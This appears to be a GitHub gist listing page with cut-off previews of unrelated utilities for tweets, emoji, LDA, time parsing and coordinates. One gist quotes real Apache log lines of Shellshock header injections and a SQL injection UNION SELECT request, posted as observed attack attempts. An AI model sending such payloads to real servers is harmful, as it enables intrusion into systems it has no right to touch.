Brendan O'Connor brendano

r"""
stdin: IDs of tweets to get (whitespace or line separated)
stdout: the tweets as two-column TSV: ID \t TweetJSON
This retrieves tweets using the API.
If an error occurs when retrieving a message (most commonly because the
message has since been deleted), the error information is saved as JSON
instead. There should therefore be exactly as many output lines as input IDs.
# -*- encoding: utf-8 -*-
# actually that encoding line is NOT important codewise. only for doc purposes.
"""
Detect emoji or other emoji-like things in Python.
The regular expressions here can be used either to identify emoji or to remove them.
The comments are written from the perspective of removing them.
The regexes also match some things besides emoji.
by Brendan O'Connor (http://brenocon.com) 2016-10-20
originally written as part of https://arxiv.org/abs/1608.08868
# by brendan o'connor (http://brenocon.com) written in early 2012
# parallelized collapsed gibbs sampling for LDA with threads in cython
# need to delete these lines to get the cython instructions to work...
#cython: boundscheck=False, cdivision=True
# vim:sts=4:sw=4
import numpy as np
cimport numpy as np
cimport cython
cimport openmp
brendano / gist:2a90765581e88c8b1b16
Last active October 20, 2015 18:47
munge H:M:S and M:S into seconds for zsh time command with ruby regexes
For example, for data that looks like
qwerasdvzxcasdf 0.62s user 18.55s system 92% cpu 20.678 total
asdfasdf 838.56s user 10.75s system 100% cpu 14:08.98 total
acvzxcvzxcv 3:15:12.2 total
asdfadsf 0.22s user 6.24s system 0% cpu 16:01.30 total
output those 4 numbers in seconds
20.678
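The original gist does this conversion with Ruby regexes, which are not shown here. As a rough illustration of the same idea, here is a minimal Python sketch. The names `TOTAL_RE`, `to_seconds`, and `extract_total_seconds` are hypothetical, and it assumes the elapsed time is always the field immediately before the word `total`.

```python
import re

# Hypothetical pattern: up to two "N:" prefixes (hours, minutes), then
# seconds with an optional fraction, followed by the word "total".
TOTAL_RE = re.compile(r'((?:\d+:){0,2}\d+(?:\.\d+)?)\s+total')

def to_seconds(clock):
    """Convert 'S', 'M:S' or 'H:M:S' into a float number of seconds."""
    seconds = 0.0
    for part in clock.split(':'):
        # Each field further left is worth 60 times the one to its right.
        seconds = seconds * 60 + float(part)
    return seconds

def extract_total_seconds(line):
    """Return the 'total' time of one zsh `time` line in seconds, or None."""
    match = TOTAL_RE.search(line)
    if match is None:
        return None
    return to_seconds(match.group(1))
```

Applied line by line to the sample data above, `extract_total_seconds` yields one number per line, and returns `None` for any line that has no `total` field.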
#!/usr/bin/env python
import sys,os,re,json
from hose_util import iterate, lookup
# import geodb
# country_db = geodb.GeoDB.load_geojson_files(['/home/brenocon/geocode/tm_world_borders-0.3.json'])
OneCoord = r'([-+]?\d{1,3}\.\d{3,})'
Separator= r', ?'
LatLong = re.compile(OneCoord + Separator + OneCoord, re.U)
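The preview stops before the pattern is used. As a hedged sketch of how `LatLong` might be applied, the helper below pulls the first coordinate pair out of a free-text string. The function name `find_latlong` and the range check on the parsed values are assumptions for illustration, not part of the original script.

```python
import re

# Same patterns as in the script above.
OneCoord = r'([-+]?\d{1,3}\.\d{3,})'
Separator = r', ?'
LatLong = re.compile(OneCoord + Separator + OneCoord, re.U)

def find_latlong(text):
    """Return (lat, lon) for the first coordinate pair in text, else None."""
    match = LatLong.search(text)
    if match is None:
        return None
    lat, lon = float(match.group(1)), float(match.group(2))
    # Assumption: discard pairs that cannot be valid geographic coordinates.
    if not (-90 <= lat <= 90 and -180 <= lon <= 180):
        return None
    return lat, lon
```

Because `OneCoord` requires at least three decimal places, short decimals such as `1.5, 2.5` are not treated as coordinates.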
brendano / -
Created October 27, 2014 21:16
tw2created_at_iso.py
#!/usr/bin/env python
import ujson as json
import time,sys
from datetime import datetime
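def parse_date(twitter_lame_datetime_string):
    # e.g. the 'created_at' field
    ts = time.strptime(twitter_lame_datetime_string, "%a %b %d %H:%M:%S +0000 %Y")
    # Use only the first six fields (year through second); the seventh field
    # of struct_time is the weekday, which datetime() would read as microseconds.
    return datetime(*ts[:6])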
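The preview ends before showing how `parse_date` is used. Judging only by the filename, the script presumably emits ISO timestamps, so the sketch below shows one way that could look. The wrapper `created_at_iso` is hypothetical, the sketch passes only the first six `struct_time` fields to `datetime`, and it assumes an English locale so that `%a` and `%b` match Twitter's day and month abbreviations.

```python
import time
from datetime import datetime

def parse_date(created_at):
    """Parse a Twitter 'created_at' string (always UTC, '+0000')."""
    ts = time.strptime(created_at, "%a %b %d %H:%M:%S +0000 %Y")
    # Year, month, day, hour, minute, second.
    return datetime(*ts[:6])

def created_at_iso(created_at):
    """Hypothetical helper: return the timestamp in ISO 8601 form."""
    return parse_date(created_at).isoformat()
```

The resulting `datetime` is naive (it carries no timezone), so callers need to remember that the value is in UTC.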
Shellshock attack attempts I noticed in Apache logs, found with grep '()'. I think I initiated the shellshock-scan request myself, but I believe the rest are attack attempts.
209.126.230.72 - - [24/Sep/2014:22:55:07 -0400] "GET / HTTP/1.0" 301 - "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
94.228.220.68 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)-- HTTP/1.1" 200 31516 "-" "-"
89.207.135.125 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:17:14:32 -0400] "GET / HTTP/1.1" 301 - "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
54.251.83.67 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
114.91.105.103 - -
~ % cat bla
digraph A {
0 [label = "hello\\"]
}
~ % dot -Tpdf bla > out.pdf
===> http://brenocon.com/20141005_dot.pdf
brendano / gist:963c826e7109a5e50d54
Created July 3, 2014 16:50
papers that do NLP-like stuff with source code
NLP and source code papers, very scattered and partial listing
(collected by Nathan Schneider and Brendan O'Connor)
ICML 2014
Maddison and Tarlow
Structured Generative Models of Natural Source Code
http://jmlr.org/proceedings/papers/v32/maddison14.pdf
ACL 2013